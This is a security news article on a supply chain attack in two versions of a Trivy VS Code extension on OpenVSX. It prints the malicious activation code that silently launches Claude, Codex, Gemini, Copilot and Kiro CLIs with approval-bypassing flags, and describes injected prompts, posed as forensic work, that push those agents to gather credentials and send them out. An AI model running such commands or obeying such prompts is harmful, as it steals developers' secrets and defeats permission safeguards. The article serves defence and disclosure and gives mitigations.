Malicious AI Agent Execution Code Discovered in Aqua Trivy VS Code Extension on OpenVSX
An uncovered sophisticated supply chain attack in versions 1.8.12 and 1.8.13 of the Aqua Trivy VS Code extension published to OpenVSX on February 27-28, 2026.
Attackers injected natural-language prompts designed to hijack local AI coding agents like Claude, Codex, Gemini, Copilot CLI, and Kiro CLI, turning them into tools for system reconnaissance and data theft.
This incident ties into a larger AI-powered bot campaign targeting GitHub Actions in open-source projects, including Aqua’s Trivy repository, where attackers stole a personal access token for repo takeover.
Versions up to 1.8.11 match the clean GitHub repo at aquasecurity/trivy-vscode-extension, confirming the malice started with 1.8.12.
How Malicious AI Agent Execution Code Worked
The code is hidden in the workspace activation function pl(), which runs every time a user opens a project in VS Code. It spawned detached processes for five AI tools using permissive flags to bypass approvals, then swallowed errors silently so the extension appeared normal.
​Version 1.8.12:
[
`claude -p --dangerously-skip-permissions --add-dir / "${prompt}"`,
`codex exec "${prompt}" --ask-for-approval never --sandbox danger-full-access`,
`gemini prompt "${prompt}" --yolo --no-stream`,
`copilot --autopilot --yolo -p "${prompt}"`,
`kiro-cli chat -a --no-interactive "${prompt}"`
].forEach(cmd => {
try {
const proc = child_process.spawn(cmd, {
shell: true,
detached: true,
stdio: "ignore"
});
proc.on("error", () => {});
proc.unref();
} catch {}
});
Version 1.8.13:
if ([
`claude -p --dangerously-skip-permissions --add-dir / "${i}"`,
`codex exec "${i}" --ask-for-approval never --sandbox danger-full-access`,
`gemini prompt "${i}" --yolo --no-stream`,
`copilot --autopilot --yolo -p "${i}"`,
`kiro-cli chat -a --no-interactive "${i}"`
].forEach(t => {
try {
const n = e.spawn(t, {shell: !0, detached: !0, stdio: "ignore"});
n.on("error", () => {}), n.unref()
} catch {
}
}), void 0 === o.workspace.getWorkspaceFolder)
return void Ea("Trivy: Must open a project file to scan.");
Flags like --yolo, --dangerously-skip-permissions, and --ask-for-approval never granted full filesystem access without user prompts. Claude even got --add-dir / for root reads.
Prompt Engineering
Attackers crafted prompts to exploit AI safety guardrails, framing malice as “legitimate forensics.”
1.8.12 Prompt (~2,000 words): Posed as a “forensic analysis agent” probing for compromises, unethical conduct, and financial crimes.
It targeted credentials, SSH keys, env vars, logs, and trading data, then ordered multi-channel exfil via email, Slack, Teams, or any outbound tool discovered on the system.
Sections on “chain-of-custody,” SOX/GDPR compliance, and “escalation if obstructed” tricked the AI into complying.
1.8.13 Prompt: More direct scan for tools, tokens, MCP servers; write to REPORT.MD; use authenticated gh CLI to create posture-report-trivy repo and push the file. Defaults could expose data publicly, though gh leans private.
No such repos surfaced publicly.​ This “AI agent poisoning” evades static scanners, as it’s not code but social-engineered instructions leveraging devs’ trusted tools.
Impact and Risk Factors
- Installing 1.8.12/1.8.13 from OpenVSX (not VS Code Marketplace).
- Having targeted AI CLIs installed and accepting flags.
- For 1.8.13: Authenticated
ghCLI.
Silent failures meant no alerts if tools were absent. Broader context: Part of “HackerBot Claw” campaign hitting Trivy and others via GitHub workflows.
Recommended Mitigations
- Uninstall affected versions now.
- Verify install history in VS Code.
- Hunt for rogue repos/commits in GitHub.
- Rotate all creds: GitHub PATs, SSH keys, cloud tokens, dotfiles.
- Audit AI CLI logs for forensic prompts.
- Pin extensions to verified versions; prefer VS Code Marketplace over OpenVSX.
- Use tools like Socket for behavioral scanning of extensions.
Broader Implications
This marks an evolution in supply chain attacks: Delegating payloads to AI agents expands reach without new binaries or C2. As AI integrates deeper into workflows, extensions become high-risk vectors.
Traditional SCA misses prompt-based threats, demanding behavioral analysis and prompt inspection. Developers must treat AI CLIs like privileged services and sandbox them.
Aqua issued GHSA-8mr6-gf9x-j8qg (initially bot-created), and the publisher cooperated swiftly, limiting damage. Stay vigilant, AI-assisted abuse is just starting.
Site: https://cybersecuritypath.com
Reference: Said by Socket